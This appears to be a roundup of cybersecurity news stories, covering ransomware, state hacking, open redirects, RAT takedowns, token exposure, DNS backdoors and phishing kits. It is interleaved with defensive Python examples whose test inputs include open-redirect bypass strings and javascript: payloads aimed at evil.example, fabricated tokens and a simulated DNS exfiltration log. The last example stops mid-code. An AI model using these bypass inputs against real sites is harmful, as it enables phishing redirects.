
Unveiling the New Era of Hacking Ethics: Profit Over Principles

 

Hacking, once a realm of curiosity-driven exploration, has morphed into a complex ecosystem of profit-driven cybercrime. Originating in the 1960s, hacking was fueled by the insatiable curiosity of a brilliant community known as "hackers." These early pioneers sought to push the boundaries of computing and digital technology, driven by a passion for discovery rather than malicious intent. 

However, the perception of hacking has since undergone a dramatic transformation. Today, the term "hacking" often conjures images of lone individuals in hoodies, exploiting vulnerabilities to steal data or wreak havoc from the safety of dimly lit rooms. While this stereotype may be exaggerated, it reflects a disturbing reality: the rise of cybercriminals who exploit technology for personal gain. 

In recent years, there has been a notable shift in the attitudes and behaviours of hackers, particularly within criminal cyber rings. Once governed by unwritten codes of ethics, these groups are now redefining the rules of engagement, prioritizing profit above all else. What was once considered off-limits—such as targeting hospitals or critical infrastructure—is now fair game for profit-driven hackers, posing significant risks to public safety and national security. 

One of the most alarming trends is the rise of ransomware, where attackers encrypt data and demand payment for its release. These attacks have become increasingly brazen, hitting organisations of every size and industry. The 2021 Colonial Pipeline attack is the clearest illustration: the ransomware struck the company's business IT systems rather than the pipeline's control systems, but the operator halted pipeline operations for several days as a precaution, causing fuel shortages along the US East Coast and sending shockwaves through the security community about the audacity and impunity of modern cybercriminals. 

Moreover, attackers are no longer content with hitting a victim once. Re-extorting the same organisation, or exploiting the same unpatched weakness repeatedly, has become commonplace, reflecting growing sophistication and ruthlessness. Several factors have driven this shift in hacking ethics: geopolitical tensions, technological advances, and the proliferation of online platforms have all shaped the behaviour of modern attackers. 

The accessibility of hacking tools and information has lowered the barrier to entry, attracting individuals of all ages and skill levels to the world of cybercrime. Despite efforts by law enforcement and cybersecurity professionals, the threat of cybercrime continues to loom large. 

Businesses and individuals must remain vigilant, investing in robust cybersecurity measures and staying informed about evolving threats. By understanding the changing landscape of hacking ethics, we can better defend against cyber attacks and protect our digital assets and identities in an increasingly connected world.

Gmail and Facebook Users Advised to Secure Their Accounts Immediately

 



In a recent report by Action Fraud, it has been disclosed that millions of Gmail and Facebook users are at risk of cyberattacks, with Brits losing a staggering £1.3 million to hackers. The data reveals that a concerning 22,530 individuals fell victim to account breaches in the past year alone.

According to Pauline Smith, Head of Action Fraud, the ubiquity of social media and email accounts makes everyone susceptible to fraudulent activities and cyberattacks. As technology advances, detecting fraud becomes increasingly challenging, emphasising the critical need for enhanced security measures.

The report highlights three primary methods used to compromise accounts: on-platform chain hacking, leaked passwords, and phishing. In on-platform chain hacking, a criminal takes control of one account and uses it as a springboard into others, for instance by abusing the access it gives to messages, contacts or password-reset links. Passwords leaked in earlier data breaches are then tried against other services, which succeeds whenever a password has been reused.

To safeguard against such threats, Action Fraud recommends adopting robust security practices. Firstly, users are advised to create strong and unique passwords for each of their email and social media accounts. One effective method suggested is combining three random words that hold personal significance, balancing memorability with security.

Moreover, implementing 2-Step Verification (2SV) adds an extra layer of protection to accounts. With 2SV, users are prompted to provide additional verification, such as a code sent to their phone, when logging in from a new device or making significant changes to account settings. This additional step fortifies account security, mitigating the risk of unauthorised access even if passwords are compromised.

Recognizing the signs of phishing scams is also crucial in preventing account breaches. Users should remain vigilant for indicators such as spelling errors, urgent requests for information, and suspicious inquiries. By staying informed and cautious, individuals can reduce their vulnerability to cyber threats.

In response to the escalating concerns, tech giants like Google have implemented measures to enhance password security. Features such as password security alerts notify users of compromised, weak, or reused passwords, empowering them to take proactive steps to safeguard their accounts.

The prevalence of online account breaches means users must stay alert about online security. By adopting best practices such as creating strong passwords, enabling 2-Step Verification, and recognising phishing attempts, users can safeguard their personal information and financial assets from malicious actors.



Russian Hackers Breach Microsoft's Security: What You Need to Know

 


Reports have surfaced of a significant cyberattack on Microsoft attributed to the Russian state-sponsored group tracked as Midnight Blizzard (also known as Nobelium or APT29). The breach has raised serious concerns among cybersecurity experts and the public alike.

The attackers first gained access to corporate email accounts, including those of senior leadership, and later used information taken from those mailboxes to reach some of Microsoft's source code repositories and internal systems, along with communications with partners in government, defence and business. Microsoft has said it found no evidence that customer-facing systems were compromised, but the breach has far-reaching implications for national and international security.

Security experts warn that access to source code makes it easier for attackers to find zero-day vulnerabilities, flaws unknown to the vendor for which no patch yet exists. Source code is not a "master key" that opens systems by itself, but it lets an attacker hunt for exploitable bugs far more efficiently than black-box testing would, and any credentials or keys embedded in it are immediately usable.

The severity of the breach has prompted strong reactions from industry professionals. Ariel Parnes, COO of Mitiga, describes the incident as "severe," emphasising the critical importance of source code security in the digital age. Shawn Waldman, CEO of Secure Cyber Defense, condemns the attack as a "worst-case scenario," highlighting the broader implications for national security.

The compromised data includes emails of senior leadership, confidential communications with partners, and secrets such as passwords and authentication keys that had been shared between Microsoft and its customers in email. Larry Whiteside Jr., a cybersecurity expert, warns of potential compliance complications for Microsoft users and partners, as regulators scrutinise the breach's impact under data protection laws.

As the fallout from the breach unfolds, there are growing concerns about the emergence of zero-day vulnerabilities and the need for proactive defence measures. Experts stress the importance of threat hunting and incident response planning to mitigate the risks posed by sophisticated cyber threats.

The incident underscores that even tech giants like Microsoft are not immune to well-resourced state actors, and that attackers increasingly target supply chains: secrets and communications stolen from a vendor become the entry point into its customers. Any credential or key that was shared with a third party in email should be treated as exposed and rotated.

The breach serves as a wake-up call for individuals and organisations alike. By staying vigilant and proactive, and by working together to protect critical infrastructure and data, stakeholders can mitigate the risks posed by sophisticated threats and protect their digital assets from exploitation.


Old Website Tool Exploited by Hackers, Puts Education and Government Sites at Risk

Attackers are abusing an old CMS editing component on websites that have not been updated in years, using it to compromise educational and government sites around the world. Their goal is to manipulate search results so that visitors are sent to malicious or scam sites. The underlying flaw is an open redirect: the site forwards visitors to whatever destination an attacker places in a URL, under the site's own trusted domain name. 

An attacker can send a phishing email that appears to come from your organisation. The link carries your domain name and looks legitimate, but whoever clicks it is bounced from your site straight to the attacker's. 

The trick works because the website itself performs the forwarding, either server-side (an HTTP 3xx response with a Location header) or client-side (a JavaScript or meta-refresh redirect). Either way, the damage lands on your reputation, since your domain vouched for the destination. 

Consider a link of the form "https://www.example.com/?redirect=" followed by a destination. The parameter was meant to send a visitor on to a specific page, but nothing stops anyone from replacing the destination with any site they like. It is a signpost that anyone can repaint. That is an open redirect. 

Attackers exploit open redirects on trusted domains to run phishing campaigns, distribute malware, or host scams behind a reputable URL. Because the first hop is a well-known domain, these links often slip past URL filters and mail security products. When search engines index the redirecting URLs, the reputation of the trusted site carries over to the malicious content, pushing it higher in results for targeted searches. Despite these risks, vendors and bug-bounty programmes often treat open redirects as low severity and may not prioritise fixing them unless they are chained with a more serious vulnerability. 
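As an added example that is not part of the original post, the Python below contrasts the open-redirect pattern with a hardened version. `ALLOWED_HOSTS`, `SITE_BASE` and the two function names are assumptions chosen for the illustration; the inputs in the comments are the bypasses practitioners usually test (absolute URLs to other hosts, protocol-relative `//host`, backslash variants, `userinfo@host` confusion and non-HTTP schemes).

```python
from urllib.parse import urljoin, urlsplit

# Assumptions for the illustration: the site owns these hosts.
ALLOWED_HOSTS = {"www.example.com", "example.com"}
SITE_BASE = "https://www.example.com/"


def vulnerable_redirect_target(redirect_param: str) -> str:
    """The open-redirect pattern: the ?redirect= value is used verbatim as the
    Location header, so any destination an attacker supplies is honoured."""
    return redirect_param


def safe_redirect_target(redirect_param: str, default: str = "/") -> str:
    """Return a Location that cannot leave ALLOWED_HOSTS.

    Handles the usual bypasses: absolute URLs to other hosts, protocol-relative
    '//evil.example', backslash variants ('/\\evil.example', which browsers read
    as '//'), 'javascript:' pseudo-URLs and 'https://www.example.com@evil.example'.
    """
    if not redirect_param:
        return default
    # Browsers normalise '\' to '/' in URLs; do the same before parsing so that
    # '/\\evil.example' is seen as the protocol-relative URL it really is.
    candidate = redirect_param.replace("\\", "/")
    # Resolve relative targets against our own origin; absolute ones stay as-is.
    parts = urlsplit(urljoin(SITE_BASE, candidate))
    if parts.scheme not in ("http", "https"):
        return default
    # urlsplit().hostname strips any 'user:pass@' prefix and lower-cases the host,
    # so 'www.example.com@evil.example' yields 'evil.example' here.
    if parts.hostname not in ALLOWED_HOSTS:
        return default
    # Hand back a site-relative path only. Collapse leading slashes so that a
    # path of '//evil.example' cannot turn into a protocol-relative redirect.
    path = "/" + parts.path.lstrip("/")
    return f"{path}?{parts.query}" if parts.query else path


if __name__ == "__main__":
    for target in ["/account?tab=security", "https://evil.example/", "//evil.example/",
                   "/\\evil.example", "https://www.example.com@evil.example/",
                   "javascript:alert(1)", "https://www.example.com//evil.example"]:
        print(f"{target!r:45} -> {safe_redirect_target(target)!r}")
```

The safe version never echoes a host back at all: it only returns a path and query on the current origin, which is the simplest way to make the bypass list above irrelevant. If a feature genuinely needs to redirect off-site, replace the free-form parameter with an index into a server-side table of approved destinations.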

@g0njxa, a security researcher, uncovered a malicious redirect campaign targeting university websites. It exploits open redirect flaws in FCKeditor, a web text editor that was superseded by CKEditor in 2009 yet is still deployed by many institutions. 

@g0njxa identified several prominent institutions affected, including MIT, Columbia University, and government websites in Virginia and Spain. The developer's response to the findings, that FCKeditor has been obsolete since 2010 and should no longer be used, underscores the urgency of migrating to a maintained alternative: no fix will ship for an unsupported product, so removing it is the only remediation.

FBI Shuts Down Warzone RAT; Cybercriminals Arrested

 


In a major victory against cybercrime, the FBI has successfully taken down the Warzone RAT malware operation. This operation led to the arrest of two individuals involved in the illicit activities. One of the suspects, 27-year-old Daniel Meli from Malta, was apprehended for his role in the distribution of Warzone RAT, a notorious remote access trojan used for various cybercrimes.

Warzone RAT, also known as 'AveMaria,' surfaced in 2018 as a commodity malware offering a range of malicious features. These include bypassing User Account Control (UAC), stealing passwords and cookies, keylogging, remote desktop access, webcam recording, and more. Meli's arrest took place last week in Malta following an indictment issued by U.S. law enforcement authorities on December 12, 2023.

The charges against Meli include unauthorised damage to protected computers, illegally selling and advertising an electronic interception device, and participating in a conspiracy to commit several computer intrusion offences. He has been involved in the cybercrime space since at least 2012, starting at the age of 15 by selling hacking ebooks and the Pegasus RAT for a criminal group called 'Skynet-Corporation.'

Simultaneously, another key figure linked to Warzone RAT, Prince Onyeoziri Odinakachi, 31, from Nigeria, was arrested for providing customer support to cybercriminals purchasing access to the malware. Federal authorities in Boston seized four domains, including the primary website "warzone.ws," associated with Warzone RAT.

The international law enforcement effort coordinated by the FBI not only resulted in arrests but also identified and confiscated server infrastructure related to the malware across various countries, including Canada, Croatia, Finland, Germany, the Netherlands, and Romania.

While the U.S. Department of Justice (DoJ) mainly implicates Meli in the distribution and customer support for the malware, it remains unclear whether he is the original creator of Warzone RAT. The DoJ announcement reveals Meli's involvement as a seller in the cybercrime space since the age of 15, raising questions about the malware's origin.

Meli faces serious consequences, with a potential 15-year prison sentence, three years of supervised release, and fines of up to $500,000 or twice the gross gain or loss (whichever is greater) for the charges against him. The Northern District of Georgia seeks Meli's extradition from Malta to the United States for trial.

This operation not only brings two alleged cybercriminals before the courts but also dismantles infrastructure supporting Warzone RAT. The FBI's coordination with international law enforcement agencies highlights the commitment to combating cyber threats globally, and the takedown should deter similar malware-as-a-service operations.


Hugging Face's AI Supply Chain Escapes Near Breach by Hackers

 

A recent report from VentureBeat reveals that Hugging Face, a prominent AI platform hosting pre-trained models and datasets, narrowly escaped a potentially devastating attack on its supply chain. The incident underscores existing weaknesses in the rapidly expanding field of generative AI.

Lasso Security researchers audited public GitHub and Hugging Face repositories and uncovered more than 1,600 valid, exposed API tokens. Had attackers found them first, the tokens would have granted write access to widely used AI models consumed by millions of downstream applications, letting them tamper with the models themselves.

The seriousness of the situation was emphasized by the Lasso research team, stating, "With control over an organization boasting millions of downloads, we now possess the capability to manipulate existing models, potentially turning them into malicious entities."

HuggingFace, known for its open-source Transformers library hosting over 500,000 models, has become a high-value target due to its widespread use in natural language processing, computer vision, and other AI tasks. The potential impact of compromising HuggingFace's data and models could extend across various industries implementing AI.

The focus of Lasso's audit centered on API tokens, acting as keys for accessing proprietary models and sensitive data. The researchers identified numerous exposed tokens, some providing write access or full admin privileges over private assets. With control over these tokens, attackers could have compromised or stolen AI models and supporting data.

This discovery maps onto three risk areas in the OWASP Top 10 for Large Language Model Applications: supply chain vulnerabilities, training data poisoning, and model theft. As AI continues to integrate into business and government functions, ensuring security throughout the entire supply chain, from data to models to applications, becomes crucial.

Lasso Security recommends that companies like HuggingFace implement automatic scans for exposed API tokens, enforce access controls, and discourage the use of hardcoded tokens in public repositories. Treating individual tokens as identities and securing them through multifactor authentication and zero-trust principles is also advised.
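To make the first recommendation concrete, here is an added example (not Lasso's or Hugging Face's code) of a minimal scanner for exposed Hugging Face user access tokens in repository files. It assumes the token format `hf_` followed by 34 alphanumeric characters, skips obvious placeholders, and reports only a redacted form so the scanner's own output does not leak the secret. The sample repository contents are constructed and the tokens in them are fabricated.

```python
import re

# Assumption: Hugging Face user access tokens are "hf_" + 34 alphanumerics.
HF_TOKEN_RE = re.compile(r"\bhf_[A-Za-z0-9]{34}\b")
MIN_DISTINCT_CHARS = 8  # hf_xxxx... style placeholders have far fewer


def redact(token: str) -> str:
    """Keep enough to locate the token in the file, never enough to use it."""
    return token[:6] + "..." + token[-4:]


def looks_like_placeholder(token: str) -> bool:
    """Documentation placeholders repeat one or two characters; real tokens do not."""
    return len(set(token[3:])) < MIN_DISTINCT_CHARS


def scan_text(text: str, source: str) -> list:
    """Return one finding per candidate token, with line number and redacted value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in HF_TOKEN_RE.finditer(line):
            token = match.group(0)
            if looks_like_placeholder(token):
                continue
            findings.append({"source": source, "line": lineno, "token": redact(token)})
    return findings


def scan_sources(sources: dict) -> list:
    """sources maps a path-like name to file contents (read from disk in real use)."""
    findings = []
    for name, text in sources.items():
        findings.extend(scan_text(text, name))
    return findings


# Constructed sample repository; the tokens are fabricated, not live credentials.
SAMPLE_REPO = {
    "train.ipynb": (
        "from huggingface_hub import login\n"
        'login(token="hf_AbCdEfGhIjKlMnOpQrStUvWxYz01234567")  # hardcoded: bad\n'
    ),
    ".env": "HF_TOKEN=hf_ZyXwVuTsRqPoNmLkJiHgFeDcBa98765432\n",
    "README.md": (
        "Set your token in the environment:\n"
        "    export HF_TOKEN=hf_" + "x" * 34 + "\n"
    ),
    "app.py": 'import os\ntoken = os.environ["HF_TOKEN"]  # read at runtime: fine\n',
}

if __name__ == "__main__":
    for f in scan_sources(SAMPLE_REPO):
        print(f"{f['source']}:{f['line']}: exposed token {f['token']}")
```

Run as a pre-commit hook or a CI step, a non-empty result should fail the build; the finding on `.env` is the common case where a file meant to be ignored was committed anyway. Any token this reports must be revoked, not merely removed from the file, because it remains in the repository history.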

The incident highlights the necessity for continual monitoring to validate security measures for all users of generative AI. Simply being vigilant may not be sufficient to thwart determined efforts by attackers. Robust authentication and implementing least privilege controls, even at the API token level, are essential precautions for maintaining security in the evolving landscape of AI technology.

Hackers Use This New Malware to Backdoor Targets in Middle East, Africa and U.S

 

Various entities in the Middle East, Africa, and the United States have fallen victim to an unidentified threat actor orchestrating a campaign that deploys a recently discovered backdoor named Agent Racoon. According to Chema Garcia, a researcher at Palo Alto Networks Unit 42, the malware is written for the .NET framework and uses the Domain Name System (DNS) protocol as a covert command-and-control channel, carrying backdoor traffic inside DNS queries and responses so that it blends in with ordinary name resolution.

The targeted organizations hail from a range of sectors, including education, real estate, retail, non-profit, telecommunications, and government. Despite the lack of attribution to a specific threat actor, the campaign is suspected to be state-sponsored due to discernible victimology patterns and the utilization of sophisticated detection and defense evasion techniques. Palo Alto Networks is monitoring this threat cluster under the label CL-STA-0002. The exact method of infiltration and the timeline of the attacks remain unclear at this point.

The adversary employs additional tools alongside Agent Racoon, such as a customised version of Mimikatz named Mimilite and a novel credential stealer known as Ntospy. Ntospy registers a custom DLL as a Windows network provider, a legitimate extension point that receives users' credentials at logon, and abuses it to capture those credentials and store them for later collection. Notably, while Ntospy was found across the affected organisations, Mimilite and Agent Racoon were specifically observed in the environments of non-profit and government-related organisations.

Agent Racoon, executed through scheduled tasks, enables the execution of commands, uploading and downloading of files, all while camouflaging itself as Google Update and Microsoft OneDrive Updater binaries. The command-and-control (C2) infrastructure linked to the implant dates back to at least August 2020, with the earliest sample of Agent Racoon uploaded to VirusTotal in July 2022.

Unit 42's investigation revealed instances of successful data exfiltration from Microsoft Exchange Server environments, resulting in the theft of emails matching various search criteria. The threat actor has also been observed harvesting victims' Roaming Profile. Despite these findings, the tool set associated with this campaign has not been definitively linked to a specific threat actor and appears to extend beyond a single cluster or campaign, according to Garcia.
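The DNS channel described above leaves a characteristic trace in resolver logs: many queries from one host to one domain whose leftmost label is long and high-entropy, frequently of record types such as TXT that carry arbitrary data. The following Python is an added example of that heuristic run over a constructed resolver log; it is not Unit 42's tooling, and the log format, thresholds and the domain `svc-updater.test` are assumptions, not indicators from the report.

```python
import hashlib
import math
from collections import defaultdict

MIN_QUERIES = 5       # fewer than this is not enough evidence to flag
MIN_LABEL_LEN = 20    # mean length of the leftmost (data-carrying) label
MIN_ENTROPY = 3.0     # mean Shannon entropy in bits/char of that label


def shannon_entropy(s: str) -> float:
    """Bits per character: random hex scores ~3.6-4.0, ordinary hostnames far lower."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(qname: str) -> str:
    """Simplification: the last two labels. Production code should use the public suffix list."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_line(line: str):
    """Assumed log format: '<timestamp> <client-ip> <qtype> <qname>'."""
    ts, client, qtype, qname = line.split()
    return ts, client, qtype.upper(), qname.lower()


def profile_clients(lines):
    """Aggregate per (client, registered domain) the signals a DNS tunnel produces."""
    acc = defaultdict(lambda: {"count": 0, "label_len": 0.0, "entropy": 0.0, "txt": 0})
    for line in lines:
        if not line.strip():
            continue
        _, client, qtype, qname = parse_line(line)
        first_label = qname.split(".")[0]
        s = acc[(client, registered_domain(qname))]
        s["count"] += 1
        s["label_len"] += len(first_label)
        s["entropy"] += shannon_entropy(first_label)
        s["txt"] += qtype == "TXT"
    profiles = {}
    for key, s in acc.items():
        n = s["count"]
        profiles[key] = {"count": n, "mean_label_len": s["label_len"] / n,
                         "mean_entropy": s["entropy"] / n, "txt_share": s["txt"] / n}
    return profiles


def suspicious_pairs(lines):
    """Return the (client, domain) pairs whose query profile looks like tunnelling."""
    return {key for key, p in profile_clients(lines).items()
            if p["count"] >= MIN_QUERIES
            and p["mean_label_len"] >= MIN_LABEL_LEN
            and p["mean_entropy"] >= MIN_ENTROPY}


def build_sample_log():
    """Constructed resolver log (not real traffic): benign lookups plus a tunnel."""
    benign = [
        "2023-11-30T10:00:01Z 10.0.0.5 A www.microsoft.com",
        "2023-11-30T10:00:02Z 10.0.0.5 A update.microsoft.com",
        "2023-11-30T10:00:03Z 10.0.0.5 A go.microsoft.com",
        "2023-11-30T10:00:04Z 10.0.0.5 A download.microsoft.com",
        "2023-11-30T10:00:05Z 10.0.0.5 A learn.microsoft.com",
        "2023-11-30T10:00:06Z 10.0.0.9 A www.example.com",
    ]
    tunnel = []
    for i in range(6):
        # Hex-encoded payload chunks, as a tunnelling client would emit them.
        chunk = hashlib.sha256(f"exfil-chunk-{i}".encode()).hexdigest()[:32]
        tunnel.append(f"2023-11-30T10:01:{i:02d}Z 10.0.0.5 TXT {chunk}.svc-updater.test")
    return benign + tunnel


if __name__ == "__main__":
    log = build_sample_log()
    for key, p in profile_clients(log).items():
        flag = "SUSPICIOUS" if key in suspicious_pairs(log) else "ok"
        print(f"{key[0]:10} {key[1]:20} n={p['count']} len={p['mean_label_len']:.0f} "
              f"H={p['mean_entropy']:.2f} txt={p['txt_share']:.0%} {flag}")
```

The thresholds are deliberately loose so that CDN and anti-spam lookups with long labels do not drown the result; in practice they are tuned against a baseline of the environment's own traffic, and a hit is a lead for the host investigation (scheduled tasks, binaries posing as updaters) rather than a verdict on its own.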

Unveiling LockBit: Cybercrime Gang Targeting Global Titans in Hacking Spree

 

Ransomware, a form of malicious software, has a history spanning over three decades. However, it only gained regular attention in popular media over the last ten years.

This type of malware locks access to computer systems or encrypts files until a ransom is paid. Cybercriminal groups now view ransomware as a lucrative scheme, especially with the emergence of "ransomware as a service," which enables various groups to profit from successful ransom demands through affiliate schemes.

One prominent group, LockBit, has garnered attention by showcasing high-profile victims on its website. LockBit refers to both the malware and the group behind it, complicating its identification.

LockBit emerged in 2019 as a stealthy malware aimed at infiltrating organizations, locating valuable data, and encrypting it. Unlike mere data theft, LockBit encrypts data and holds it hostage until a ransom is paid, often resorting to threats of data publication (known as double extortion) if the payment deadline isn't met.

The LockBit group remains largely enigmatic, claiming no specific political allegiance and welcoming an unlimited number of affiliates worldwide solely interested in financial gain. However, they enforce rules prohibiting attacks on certain targets, including critical infrastructure like hospitals and specific post-Soviet countries.

Despite these rules, incidents such as a Canadian hospital falling victim to LockBit show that affiliates do not always honour them. LockBit justifies avoiding specific countries by the large number of its members originating from the former Soviet Union, even though the group claims to be based in the Netherlands.

LockBit's victims range from the United Kingdom's Royal Mail and a Ministry of Defence supplier to Japanese company Shimano and aerospace giant Boeing, whose leaked data surfaced after it refused to pay. LockBit has also claimed responsibility for the recent ransomware incident at the Industrial and Commercial Bank of China, and US authorities have linked the group to nearly 2,000 victims in the United States alone.

Ransomware as a service (RaaS) has surged in popularity, mirroring legitimate subscription software such as Microsoft 365 by giving criminals ready-made tools to run campaigns efficiently and profitably. The LockBit operators supply the malware, payment negotiation and leak site, keep roughly 20% of each ransom and leave the rest to the affiliate who carried out the intrusion, while requiring new affiliates to put down a hefty deposit in Bitcoin.

Preventing ransomware attacks involves robust cybersecurity measures such as system updates, password management, network monitoring, and prompt responses to suspicious activities. The decision to pay a ransom remains subjective for organizations, but bolstering cybersecurity measures can deter criminal groups from targeting easier victims.

Elliptic Claims: FTX Hacks Could Have Possible Connection to Russia


In November 2022, as the cryptocurrency exchange FTX collapsed, roughly $477 million was drained from its wallets. The stolen funds then sat dormant until just days before Sam Bankman-Fried, the founder and CEO of FTX, went on trial, when they began to move again. Elliptic analysts have investigated the event in depth, following the blockchain trail left by the thieves and finding evidence that points towards Russia. 

Elliptic’s Insight for the Hack 

According to a report by Elliptic – one of the largest providers of blockchain analytics and crypto compliance solutions – the hackers cleverly masked their activity by moving the stolen assets through a series of intricate transactions. They used private wallets and decentralized exchanges to make it more difficult to trace them. Elliptic was able to track the money, though, and discovered that the hackers distributed a sizable percentage of it to several locations after converting a considerable amount into ether. Potential connections to Russian actors are also revealed by Elliptic's on-chain analysis.

A Possible FTX Hack-Russia Connection 

According to Elliptic, a Russia-linked actor is potentially behind the FTX hack. The hacker's procedures and the subsequent movement of the stolen funds resemble tactics frequently associated with Russian cybercriminals.

The firm says the post-theft laundering is strikingly similar to that typically used by Russian criminal groups: the way the money was moved, the wallets chosen, and the preference for decentralised exchanges all mirror earlier Russian-linked operations.

The speed and efficiency of the laundering suggest a well-planned campaign by an experienced group. Suspects floated so far range from rogue FTX insiders carrying out an inside job to the North Korean Lazarus Group, which has been linked to a number of thefts from crypto protocols. Of these, Elliptic considers Russia-linked actors the best fit for the evidence.

Elliptic stated "A Russia-linked actor seems a stronger possibility. Of the stolen assets that can be traced through ChipMixer, significant amounts are combined with funds from Russia-linked criminal groups, including ransomware gangs and darknet markets, before being sent to exchanges.”

Elliptic's analysis not only emphasises the value of advanced blockchain analytics in confronting such cases but also highlights the geopolitical dimension of cybercrime. With the swift developments in digital currencies, understanding the origins and motivations behind these attacks has become important both for security and for international diplomatic relations.  

Russian Exiled Journalist Says EU Should Ban Spyware


The editor-in-chief of the independent Russian news site Meduza has urged the European Union to enact a comprehensive ban on spyware, given that spyware has been frequently used to violate human rights.

According to Ivan Kolpakov, Meduza's editor-in-chief, who is based in Latvia, Europeans should be very concerned about Pegasus in light of the discovery that his colleague Galina Timchenko had been hacked by an as-yet-unconfirmed EU country.

“If they can use it against an exiled journalist there are no guarantees they cannot use it against local journalists as well[…]Unfortunately, there are a lot of fans in Europe, and we are not only talking about Poland and Hungary, but Western European countries as well,” said Kolpakov.

Since last month, the European Commission has been working on guidelines for how governments could employ surveillance technologies like spyware in compliance with EU data privacy and national security rules. Although member states are responsible for their own national security, the Commission is considering adopting a position after learning that 14 EU governments had purchased Pegasus from NSO Group.

Timchenko was reportedly targeted by Pegasus in February 2023 while in Berlin for a private gathering of exiled Russian media workers. The meeting's subject was the threats posed by the Russian government's designation of independent Russian media outlets as foreign agents.

Given Timchenko's work, Russia was suspected first; but according to the digital rights organisation Access Now, additional evidence suggests that one of the intelligence services of an EU member state, which one is not yet known, is more likely responsible.

Allegedly, the motive behind the hack could be that numerous Baltic nations, to whom Russia has consistently posed a threat, are worried that a few FSB or GRU agents may have infiltrated their borders among expatriate dissidents and journalists.

“It may happen and probably it actually happens, but in my opinion, it does not justify the usage of that kind of brutal tool as Pegasus against a prominent independent journalist,” Kolpakov said.

Kolpakov believes that the revelations have left the exiled community feeling they are not safe in Europe. “This spyware has to be banned here in Europe. It really violates human rights,” he added.     

W3LL Store: Unmasking a Covert Phishing Operation Targeting 8,000+ Microsoft 365 Accounts

 

A hitherto undisclosed "phishing empire" has been identified in a series of cyber attacks targeting Microsoft 365 business email accounts spanning six years. 

According to a report from cybersecurity firm Group-IB, the threat actor established an underground market called W3LL Store, catering to a closed community of around 500 threat actors. This market offered a custom phishing kit called W3LL Panel, specifically designed to bypass Multi-Factor Authentication (MFA), alongside 16 other specialized tools for Business Email Compromise (BEC) attacks.

Between October 2022 and July 2023, the phishing infrastructure is estimated to have targeted over 56,000 corporate Microsoft 365 accounts, compromising at least 8,000 of them. The majority of the attacks were concentrated in the U.S., the U.K., Australia, Germany, Canada, France, the Netherlands, Switzerland, and Italy. The operators reportedly reaped approximately $500,000 in illegal gains.

Various sectors fell victim to this phishing campaign, notably manufacturing, IT, consulting, financial services, healthcare, and legal services. Group-IB pinpointed almost 850 distinct phishing websites associated with the W3LL Panel during the same timeframe.

The Singapore-based cybersecurity company has characterized W3LL as a comprehensive phishing tool that offers an array of services, encompassing customized phishing tools, mailing lists, and access to compromised servers. This underscores the growing prevalence of phishing-as-a-service (PhaaS) platforms.

The threat actor responsible for this kit has been active since 2017, initially focusing on creating tailored software for bulk email spam (referred to as PunnySender and W3LL Sender) before shifting their attention towards developing phishing tools for infiltrating corporate email accounts.

A key element of W3LL's arsenal is an adversary-in-the-middle (AiTM) phishing kit, capable of evading multi-factor authentication (MFA) protections. It is available for purchase at $500 for a three-month subscription, followed by a monthly fee of $150. The panel not only harvests credentials but also includes anti-bot features to bypass automated web content scanners, prolonging the lifespan of their phishing and malware campaigns.

The W3LL Store extends a 70/30 split on commissions earned through its reseller program to PhaaS affiliates, along with a 10% "referral bonus" for bringing in other trusted parties. To prevent unauthorized distribution or resale, each copy of the panel requires a license-based activation.

BEC attacks employing the W3LL phishing kit involve a preparatory phase to verify email addresses using an auxiliary utility known as LOMPAT, followed by the delivery of phishing messages. Victims who interact with the deceptive link or attachment are directed through an anti-bot script to filter out unauthorized visitors, subsequently landing on the phishing page via a redirect chain employing AiTM tactics to extract credentials and session cookies.

With this access, the threat actor proceeds to log into the target's Microsoft 365 account without triggering MFA, utilizing a custom tool called CONTOOL for automated account discovery. This enables the extraction of emails, phone numbers, and other sensitive information.

Noteworthy tactics employed by the malware author include using Hastebin, a file-sharing service, to store stolen session cookies, and utilizing platforms like Telegram and email for exfiltrating the credentials to criminal actors.
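What the kit ultimately delivers is a session cookie that the identity provider already regards as MFA-satisfied, so the defender's question becomes whether that session is later presented from somewhere it should not be. As an added example, not part of Group-IB's report or tooling, the Python below runs a simple session-reuse check over constructed sign-in and activity events: a session whose cookie is later presented from a different browser, or from a different network shortly after the sign-in, is flagged. The event fields, the `/24` comparison and the one-hour window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timezone

# Constructed events (not real telemetry); field names are assumptions.
# S1: the victim signs in through the AiTM proxy (203.0.113.10); the attacker
#     then replays the captured cookie from their own host and browser.
# S2/S3: ordinary sessions, including a benign hop inside one /24 and a
#     network change hours later (e.g. the user joining a VPN).
EVENTS = [
    {"ts": "2023-07-10T08:00:00Z", "user": "alice@corp.test", "event": "signin",
     "session": "S1", "ip": "203.0.113.10", "ua": "Chrome/114 Windows"},
    {"ts": "2023-07-10T08:03:00Z", "user": "alice@corp.test", "event": "activity",
     "session": "S1", "ip": "198.51.100.77", "ua": "Firefox/115 Linux"},
    {"ts": "2023-07-10T09:00:00Z", "user": "bob@corp.test", "event": "signin",
     "session": "S2", "ip": "192.0.2.20", "ua": "Edge/114 Windows"},
    {"ts": "2023-07-10T09:05:00Z", "user": "bob@corp.test", "event": "activity",
     "session": "S2", "ip": "192.0.2.20", "ua": "Edge/114 Windows"},
    {"ts": "2023-07-10T10:00:00Z", "user": "carol@corp.test", "event": "signin",
     "session": "S3", "ip": "192.0.2.30", "ua": "Chrome/114 Windows"},
    {"ts": "2023-07-10T10:40:00Z", "user": "carol@corp.test", "event": "activity",
     "session": "S3", "ip": "192.0.2.31", "ua": "Chrome/114 Windows"},
    {"ts": "2023-07-10T14:00:00Z", "user": "carol@corp.test", "event": "activity",
     "session": "S3", "ip": "198.51.100.5", "ua": "Chrome/114 Windows"},
]

WINDOW_MINUTES = 60  # assumption: a network change this soon after sign-in is suspicious


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def net24(ip: str) -> str:
    """Crude network identity: the IPv4 /24. A real detector would compare ASNs."""
    return ".".join(ip.split(".")[:3])


def find_session_reuse(events, window_minutes=WINDOW_MINUTES):
    """Return activity events that look like a transplanted session cookie."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e["session"]].append(e)

    findings = []
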